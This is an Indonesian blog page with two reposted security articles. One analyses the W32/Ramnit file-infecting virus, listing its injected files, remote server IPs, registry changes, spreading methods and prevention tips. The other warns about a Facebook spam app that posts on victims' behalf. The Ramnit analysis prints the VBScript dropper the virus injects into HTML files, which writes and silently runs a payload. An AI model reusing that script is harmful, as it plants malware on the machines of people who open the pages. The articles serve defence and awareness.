Jumat, 18 Maret 2011

W32/Ramnit

W32/Ramnit

Kini dengan kemampuan eksploitasi LNK (Shortcut)

Kalau Christiano Ronaldo di ibaratkan sebagai Stuxnet, tentu anda bertanya virus apa yang diibaratkan sebagai Messi ? Jawabannya adalah Ramnit. Walaupun tidak eksplosif seperti Stuxnet, namun dengan kemampuan yang tidak kalah dengan Stuxnet dalam injeksi file korbannya, Ramnit jelas menginfeksi banyak komputer di Indonesia dan pelan tapi pasti mengokohkan dirinya sebagai salah satu virus jawara yang pelru diwaspadai oleh pengguna komputer di Indonesia. Apalagi varian teranyar Ramnit yang sekarang memiliki kemampuan mengeksploitasi celah keamanan LNK (Shortcut) sehingga ia mampu menyebarkan dirinya dengan membuat Shortcut.



Di tahun 2010 lalu, dominasi stuxnet yang memanfaatkan celah keamanan LNK (shortcut) merupakan sebuah salah satu langkah kerja cerdas dari pembuat malware. Bukan hanya sekedar mendominasi, tetapi juga menjadi trending topik malware di berbagai artikel dan analisis di seluruh dunia.


Di saat dominasi stuxnet masih booming hingga saat ini, sebaiknya kita perlu waspada pula terhadap varian malware baru yang berusaha menunjukkan eksistensi-nya dengan usaha kerja keras dari pembuat malware. Diantara varian malware yang patut di waspadai adalah yang terdeteksi sebagai W32/Ramnit oleh Norman Security Suite. Saat ini varian malware ramnit telah menyebar dengan cepat di seluruh dunia. Serangan ramnit ikut melengkapi dominasi malware mancanegara yang menyebar di Indonesia.

Keluarga malware W32/Ramnit

Malware ramnit sesungguhnya bukanlah kelompok malware yang baru, melainkan sudah aktif menyebar pula di tahun 2010. Hanya karena adanya malware pengguna celah keamanan LNK seperti shortcut, sality, stuxnet, yang membuat malware ini tidak menjadi perhatian para analisis dan pengguna komputer di dunia.


Sama seperti stuxnet, varian pertama W32/Ramnit muncul pada pertengahan Juli dan Agustus 2010. Sedangkan varian kedua W32/Ramnit muncul pada Oktober dan Nopember 2010, bersamaan dengan heboh-nya serangan sality-shortcut. Dan pada pertengahan Januari 2011 saat ini yang muncul adalah varian ketiga dari keluarga W32/Ramnit yang mencoba mengikuti jejak para pendahulunya dengan menggunakan celah keamanan LNK (shortcut) untuk melakukan infeksi dan penyebaran.


Karakteristik W32/Ramnit

Salah satu hal yang membuat kita perlu hati-hati terhadap W32/Ramnit yaitu karena malware ini termasuk kelompok virus yang melakukan infeksi file seperti Sality, Virut dan Alman. Hal ini bisa menjadi momok buat pengguna komputer, karena akan sulit membersihkan virus yang melakukan infeksi file terutama file executable (application).


W32/Ramnit merupakan salah satu varian virus yang melakukan infeksi file executable (application). Dan tidak hanya file executable, tetapi juga melakukan infeksi terhadap file web (HTML) dan file DLL (dynamic load library).


Selain itu, jika anda terhubung ke internet, ramnit akan menghubungi remote server (IRC server) dan melakukan koneksi ke beberapa alamat server zombie untuk mendownload sekumpulan malware (virus, trojan, spyware). Pada beberapa waktu tertentu, W32/Ramnit menggunakan iklan dan popup dengan konten pornografi dan perjudian (casino) maupun iklan komersial lain yang tentunya membuat anda tidak nyaman saat hendak browsing maupun surfing. Bayangkan kalau hal ini terjadi pada saat anak anda yang dibawah umur sedang menggunakan komputer yang anda proteksi dengan Parental Control. Bagi orang tua ini bencana karena anak anda terpapar pornografi (karena kemungkinan besar konten porno yang ditampilkan akan lolos dari Parental Control yang di pasang) dan bagi anak hal ini bisa-bisa dianggap "berkah" karena proteksi pornografi yang di pasang ternyata bisa diakali.


Dengan turut memanfaatkan celah keamanan LNK (shortcut), maka makin mempermudah langkahnya untuk menginfeksi pengguna komputer dengan cepat. Walaupun tidak semua varian ketiga W32/Ramnit menggunakan celah keamanan LNK (shortcut), tetapi hampir semua varian W32/Ramnit akan sangat sulit dibersihkan.


Gejala & Efek W32/Ramnit

Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :


Muncul pop-up iklan atau pop-up dengan konten pornografi/perjudian

Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (casino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman

Muncul script error atau pop-up error setelah pop-up iklan yang muncul

Setelah pop-up iklan yang muncul, akan muncul pop-up error atau script error dari browser. Muncul-nya script error ini mirip seperti virus "ARP Spoofing" pada tahun 2008.

  • Infeksi file EXE dan DLL

    Sama seperti varian malware sality, alman dan virut, W32/Ramnit melakukan infeksi file exe. Hanya saja, W32/Ramnit juga melakukan infeksi terhadap file DLL (dynamic load library).

    File exe dan dll yang di-infeksi bertambah sekitar antara 100 - 120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file exe dan dll yang di-infeksi.


Injeksi file HTML

Selain menginfeksi file exe dan dll, W32/Ramnit juga melakukan injeksi terhadap file HTML. Injeksi dilakukan dengan menambahkan pada header dan footer

Pada header, W32/Ramnit menambahkan script :

DropFileName = "svchost.exe"

Sedangkan pada footer, W32/Ramnit menambahkan script :

Set FSO = CreateObject ("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName

If FSO.FileExists(DropPath)=False Then

Set fileobj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step2

Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))

Next

Fileobj.close

End If

Set WSHshell = CreateObject ("Wscript.shell")

WSHshell.Run DropPath, 0


Membuat fungsi services Windows menjadi blank

Dengan aksi melakukan injeksi file pada file IEXPLORE.EXE dan file services.exe, serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank.

  • Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus.

    File sistem Windows yang akan menjadi sasaran injeksi W32/Ramnit yaitu :

  • C:\WINDOWS\system32\svchost.exe (file sistem yang berhubungan dengan koneksi jaringan, dengan menginjeksi akan membuat jaringan terputus)
  • C:\WINDOWS\system32\lsass.exe (file sistem yang berhubungan dengan aktifitas komputer, dengan menginjeksi akan membuat komputer hang/lambat).
  • C:\WINDOWS\system32\services.exe (file sistem yang berhubungan dengan services dan driver yang berjalan)
  • C:\Program Files\Internet Explorer\IEXPLORE.EXE (file executable dari browser internet explorer)


Aktif pada proses memory

Malware W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer

  • Melakukan koneksi ke Remote Server

    Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu diantara-nya :

195.2.252.247

195.2.252.252

69.50.193.157

74.125.227.17

74.125.227.18

74.125.227.20

95.211.127.69

Melakukan transfer data ke Remote Server

Selain mencoba melakukan koneksi dan ber-komunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban.

Melakukan broadcast

Sama seperti hal-nya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang ber-beda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu : ADX.ADNXS.COM

File virus W32/Ramnit

Malware W32/Ramnit dibuat menggunakan bahasa pemrograman C yang di kompress menggunakan UPX. File malware memiliki ciri sebagai berikut :

  • Berukuran 105 kb

  • Type file "Application'

  • Menggunakan icon "folder music"

  • Extension "exe"

Saat W32/Ramnit dijalankan, maka akan menginjeksi beberapa file sistem Windows yaitu :

  • C:\WINDOWS\system32\lsass.exe

  • C:\WINDOWS\system32\svchost.exe

  • C:\WINDOWS\system32\services.exe

  • C:\Program Files\Internet Explorer\IEXPLORE.EXE


Jika terkoneksi ke internet, W32/Ramnit akan mendownload beberapa file dan folder malware sebagai berikut :

  • C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp

  • C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat

  • C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat

  • C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe

  • C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe

  • C:\Program Files\Intenet Explorer\complete.dat

  • C:\Program Files\Intenet Explorer\dmlconf.dat

  • C:\Program Files\win\[angka_acak].exe

  • C:\Program Files\qwe

  • C:\WINDOWS\[nama_acak].exe

  • C:\WINDOWS\System32\[nama_acak].dll

  • C:\WINDOWS\System32\[nama&angka_acak].dll

  • C:\WINDOWS\Temp\[angka].tmp


Selain itu, W32/Ramnit melakukan injeksi terhadap beberapa file berikut (jika ada) yaitu :

  • C:\contacts.html

  • C:\Inetpub\wwwroot\index.html

  • C:\Program Files\Common Files\designer\MSADDNDR.DLL

  • C:\Program Files\Common Files\designer\MSHTMPGD.DLL

  • C:\Program Files\Common Files\designer\MSHTMPGR.DLL

  • C:\Program Files\Common Files\System\ado\MDACReadme.htm

  • C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL

  • C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll

  • C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll

  • C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll

  • C:\Program Files\MSN\MSNIA\custdial.dll

  • C:\Program Files\MSN\MSNIA\msniasvc.exe

  • C:\Program Files\MSN\MSNIA\prestp.exe

  • C:\Program Files\MSN\MsnInstaller\iasvcstb.dll

  • C:\Program Files\MSN\MsnInstaller\msdbxi.dll

  • C:\Program Files\MSN\MsnInstaller\msninst.dll

  • C:\Program Files\MSN\MsnInstaller\msninst.exe

  • C:\Program Files\MSN\MsnInstaller\msnsign.dll

  • C:\Program Files\NetMeeting\netmeet.htm


Selain itu pada removable disk/drive akan membuat beberapa file yaitu :

  • autorun.inf

  • Copy of Shortcut to (1).lnk

  • Copy of Shortcut to (2).lnk

  • Copy of Shortcut to (3).lnk

  • Copy of Shortcut to (4).lnk

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].exe

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].cpl

  • RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].exe

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].cpl

  • RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].cpl


Serta pada jaringan yang menggunakan mapping drive, berusaha menginjeksi beberapa file yang memiliki nama berikut :

  • Blank.htm

  • Citrus Punch.htm

  • Clear Day.htm

  • Fiesta.htm

  • Ivy.htm

  • Leaves.htm

  • Maize.htm

  • Nature.htm

  • Network Blitz.htm

  • Pie Charts.htm

  • Sunflower.htm

  • Sweets.htm

  • Technical.htm


Modifikasi Registry

Beberapa modifikasi registry yang dilakukan oleh worm Stuxnet antara lain sebagai berikut :

  • Menambah Registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control

HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol

HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION

HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international


  • Menghapus Registry

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRes tore]

DisableSR = 0x00000001


  • Merubah Registry

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]

CurrentLevel =

1601 =


Metode Penyebaran

Beberapa cara W32/Ramnit melakukan penyebaran yaitu sebagai berikut :

  • Drive by download (exploit)

    W32/Ramnit awalnya menyebar dengan memanfaatkan fitur drive by download pada system Windows. Dengan link-link yang tersebar pada forum atau e-mail, berusaha mengelabui user untuk menjalankan link tersebut. Selain itu juga saat akses pada website-website yang menyediakan konten atau plugin browser untuk di-download.

  • Removable drive/disk

Metode ini adalah metode yang umum dilakukan oleh para pengguna komputer. W32/Ramnit membuat banyak file agar menginfeksi komputer, serta ikut pula memanfaatkan celah keamanan LNK (shortcut).

  • Jaringan

    W32/Ramnit berusaha melakukan injeksi terhadap beberapa file web (htm) tertentu di jaringan pada komputer yang melakukan mapping drive. Berikut file-file tersebut :

    • Blank.htm

    • Citrus Punch.htm

    • Clear Day.htm

    • Fiesta.htm

    • Ivy.htm

    • Leaves.htm

    • Maize.htm

    • Nature.htm

    • Network Blitz.htm

    • Pie Charts.htm

    • Sunflower.htm

    • Sweets.htm

    • Technical.htm


Tips Pencegahan dari Malware W32/Ramnit

  1. Aktifkan Windows Firewall atau gunakan software firewall yang lain. Hal ini untuk mencegah dari akses yang tidak di-inginkan

  1. Pastikan komputer sudah mendapatkan update terbaru dari system Windows. Untuk mempermudah gunakan update otomatis dari system seperti "Automatic Updates". Atau bisa juga dengan men-download patch terbaru dari website Microsoft.

  1. Gunakan antivirus yang selalu terupdate dengan baik. Hal ini untuk mempermudah terhadap varian-varian dari malware yang baru.

  1. Batasi akses terhadap akses administrator. Bagi pengguna Windows 7 dan Vista, pastikan UAC (user account control) telah berjalan dengan baik.

  1. Berhati-hati saat membuka file attachment e-mail atau saat menerima transfer file dari orang yang tidak dikenal. Pastikan selalu di scan dengan antivirus yang terupdate.

  2. Berhati-hati terhadap program crack/keygen atau program-program yang tidak dikenal. Karena bisa saja sudah terinfeksi atau mengandung malware.

  3. Gunakan password yang tidak mudah dibaca dan diketahui. Pastikan selalu rubah password pada waktu-tertentu, dan bedakan password satu dengan lain-nya.

  4. Matikan fitur "autoplay" Windows untuk mencegah program yang tidak diinginkan pada removable drive/disk berjalan secara otomatis

  5. Matikan file sharing jika tidak digunakan. Jika memang menggunakan file sharing hanya berstatus read-only, atau konfigurasi sharing hanya untuk user-user tertentu.

Berhati-hati saat mengakses sebuah website atau forum yang menyediakan link-link tertentu untuk di-download atau di-install.

copy from www.vaksin.com


Diposting oleh Unknown di 12.15 0 komentar

Rabu, 16 Maret 2011

SPAM Facebook model baru




Teknologi Informasi merupakan salah satu bidang yang mengalami perkembangan luar biasa dan termasuk industri yang sangat dinamis. Apa yang populer saat ini, dalam waktu beberapa tahun akan tenggelam. Sebagai gambaran jika anda membeli piano 5 tahun yang lalu, sampai hari ini bentuk dan cara memainkan piano yah itu-itu saja, di pencet pakai tangan dan ada dua pedal (mirip gas dan rem) yang perlu di injak pada timing yang tepat. Tetapi lain dengan dunia IT, kalau dulu cara memasukkan data mengandalkan keyboard saja, lalu berkembang penggunakan mouse dan sekarang memasukkan data mengandalkan sentuhan jari. Hal ini juga terjadi pada pesan spam yang beredar. Kalau untuk kalangan pengguna seluler di Indonesia sendiri sehubungan dengan spam SMS memang agak beda, karena prinsipnya “sender takes all” yang artinya operator yang mengirimkan SMS yang akan mendapatkan 100 % penghasilan dari SMS yang dikirimkan. Akibatnya para operator berlomba-lomba memberikan SMS gratis bagi pelanggannya. Sekilas hal ini kelihatannya baik hati karena membayar dua ribu rupiah saja bisa mengirimkan ribuan SMS, tetapi sebenarnya praktek yang dilakukan oleh operator ini menyebabkan banjir SMS Spam yang disalahgunakan oleh perusahaan-perusahaan Tele Marketing untuk memasarkan Kartu Kredit, Kredit Tanpa Agunan dan promosi-promosi lainnya. Konyolnya, otoritas (BRTI) tidak berhasil meminta perusahaan telco merubah sistem “sender takes all” yang menjadi sumber masalah, tetapi yang dilakukan malah Bank Indonesia menindak Bank-Bank pengirim SMS Spam yang ternyata dilakukan oleh tenaga-tenaga outsource yang menjadikan para pengguna seluler menjadi sasaran SPAMnya. Padahal nanti dengan mudah para pelaku spam akan berubah menjadi menawarkan asuransi, multi level marketing atau layanan bisnis lainnya. Jadi para pengguna selular di Indonesia harus siap-siap makan hati menjadi korban menerima SMS spam message karena sistem “sender takes all ini”.

Demikian pula hal yang terjadi di ranah spam internet, kalau dalam 10 tahun terakhir para pengguna email dipusingkan dengan banjir spam yang masuk ke akun emailnya dan email spam yang masuk ke akun email terkadang bahkan beberapa kali lipat jumlahnya dari email yang bukan spam sehingga aplikasi anti spam sudah menjadi aplikasi wajib bagi administrator mailserver. Pertanyaannya : Apakah “penderitaan” ini sudah final dan spam saat ini hanya kita hadapi di SMS dan email ? Dalam beberapa hari terakhir ini kita mendapatkan jawabannya, spam bukan hanya muncul di SMS dan Email, tetapi aplikasi yang paling terkenal sejagad raya, Facebook kini mulai menjadi incaran para pengirim spam. Dan kali ini ancamannya tidak main-main karena korbannya mencapai ribuan pengguna Facebook. Hebatnya lagi, spam dari Facebook ini sekalipun memanfaatkan Apps (Aplikasi Facebook) tetapi tidak seperti Apps jahat lain yang pernah beredar dimana pengguna Facebook “harus” memberikan persetujuan (Allow) bagi suatu aplikasi untuk dijalankan pada akun Facebooknya, maka kali ini dengan hanya cukup mengklik tautan (link) yang diberikan dan mendapatkan pesan untuk menunggu, maka hal ini sudah cukup bagi akun Facebook tersebut terinfeksi dan langsung menyebarkan pesan berisi tautan aplikasi Facebook ke kontak-kontak Facebook Chatnya dan sekaligus melakukan posting pada profilenya.


Menurut pengetesan Vaksincom, kemungkinan besar hal ini memanfaatkan celah pemrograman yang menggunakan bahasa Java pada Apps (aplikasi) atau Facebook Chat / Apps yang rupanya memiliki kelemahan dimana sekalipun aplikasi tidak terinstal dengan sempurna sudah dapat memberikan akses kepada aplikasi untuk melakukan posting dan mengirimkan pesan FB Chat. “Kabar baiknya” bagi pengguna Internet Explorer, karena adanya error dalam script aplikasi jahat tersebut membuatnya tidak dapat dijalankan dengan sempurna pengguna Internet Explorer selamat dari eksploitasi ini, berbeda dengan pengguna Rubah Api dan Chrome yang secara mulus dapat menjalankan aplikasi tersebut. Menurut pengamatan Vaksincom, sampai hari Selasa 8 Maret 2011 sudah banyak aplikasi jahat tersebut yang dinonaktifkan oleh Facebook meskipun masih ada belasan aplikasi yang lolos dari penonaktifan dan pembuat apps jahat ini dengan mudah menambahkan apps2 dengan nama lain sehingga ancaman ini masih nyata dan perlu di waspadai. Karena aplikasi ini berjalan di browser dan server Facebook dan tidak tergantung Operating System maka para pengguna Facebook yang menggunakan Operating System apapun harus waspada dan tidak tergoda untuk melakukan klik pada link yang diberikan, sekalipun dari teman Facebook anda.

Untuk lebih jelasnya aplikasi Facebook viral ini adalah sebagai berikut :


Pada suatu hari yang cerah, sambil memikirkan harga BBM yang akan naik kamu sedang bekerja di depan komputer kamu, mengecek email, browsing sana-sini, sambil sebentar-sebentar lihat profile Facebook kamu. Tiba-tiba, ada pesan dari teman kamu dari Facebook Chat

Dalam Bahasa Inggris kalimatnya berbunyi :

Hey, What the hell are you doing in this video? Is this dancing or what? Bahahaha

http://apps.facebook.com/argo**t


Kalau kita meminta bantuan translate.google.com untuk menerjemahkan kira-kira bunyinya seperti ini :


Hello Coy, lagi ngapain ente di video ini ? Ente nari apa mabok ? Bahahaha

http://apps.facebook.com/argo**t


Mungkin karena kamu percaya kata iklan, “Teman Bisa Jadi Pegangan” maka tanpa curiga kamu langsung mengklik link yang diberikan oleh teman kamu. Maka kamu akan langsung diantarkan pada situs aplikasi Facebook tersebut dan mendapatkan page “seakan-akan” Facebook sedang menginstalkan Adobe Flash Player pada browser kamu.

Padahal logo tersebut merupakan logo palsu Adobe Flash Player dan diambil dari http://franebook.com/usa/app3/flash.png. Lengkap dengan pesan dalam bahasa Inggris :


Caution: Do Not Interrupt


yang kalau diterjemahkan kira-kira :


Perhatian: Sabar Coy, sebentar lagi


Kalau orang tua bilang, sabar subur. Maka dalam kasus ini sabar tidaklah subur, tetapi apes. Mengapa sabar apes ? Karena pada saat anda sabar menunggu sampai 100 % updated, receiving update from Adobe (gadungan) sebenarnya akun FB anda sedang “dikerjai” dan tanpa sepengetahuan (apalagi persetujuan) anda akan langsung mengirimkan pesan FB Chat ke teman-teman anda yang lain dengan isi kira-kira seperti gambar 1 di atas.

Lalu ibarat kata pepatah yang lain, sudah jatuh, tertimpa tangga, celana sobek lagi, maka selain anda mengirimkan pesan seperti gambar 1 di atas, akun Facebook anda akan digunakan sebagai sarana posting iklan pelangsing


For the past few weeks I have been trying this new weight loss product I saw on Oprah and CNN. You should check this out too. I have lost some weight already on it, and I hear many others have too”


Kalau teman-teman Facebook anda langsing-langsing semua sih oke-oke saja. Tetapi kalau ada teman anda yang badannya “agak” subur dan gampang tersinggung ..... bisa-bisa anda dimusuhi (atau di dudukin) karena dikira menghina :p.


Satu catatan lain yang menarik adalah digunakannya penyingkat alamat situs (url shortener) sehingga setiap saat alamat ini dapat dialihkan untuk menampilkan situs yang diinginkan.


UUD (Ujung Ujungnya Duit)

Menurut pengamatan Vaksincom, motivasi penyebaran pesan ini adalah untuk mendapatkan keuntungan finansial dimana salah satu produk pelangsing ini di promosikan secara masif oleh viral apps ini. Tetapi tautan menuju halaman iklan tersebut telah dihilangkan. Tetapi bukannya menyurut, pembuat apps Facebook viral ini beralih melakukan web forwarding ke situs-situs penjual ringtone yang akan menampilkan iklan ringtone berlangganan sesuai dengan lokasi geografis IP pengakses (targeted web adv) dan celakanya, ada satu penyedia ringtone berbayar Indonesia www.funmobi**id.com yang ikut dipromosikan oleh program viral FB ilegal ini.


Jika anda pernah menjadi korban dari aplikasi viral ini. Saran Vaksincom adalah sebaiknya ganti password Facebook anda (better safe than sorry) dan ingat, jangan pernah mengklik tautan / link / apps Facebook yang tidak anda ketahui secara pasti. Atau anda akan menjadi korban.


Copy from www.vaksin.com


Diposting oleh Unknown di 12.09 0 komentar
Langganan: Postingan (Atom)